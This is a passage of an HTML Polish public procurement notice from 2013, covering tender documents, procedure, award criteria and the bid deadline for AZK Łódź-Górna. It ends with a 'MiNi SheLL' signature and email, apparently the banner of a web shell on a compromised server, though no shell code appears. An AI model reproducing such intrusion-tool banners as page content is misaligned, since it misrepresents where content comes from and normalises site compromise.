<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorna.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> AZK Łódź - Górna, 93-129 Łódź, ul. Lubelska 9/11, pokój 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2013 godzina 10:00, miejsce: AZK Łódź - Górna, 93-129 Łódź, ul. Lubelska 9/11, sekretariat - pokój 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com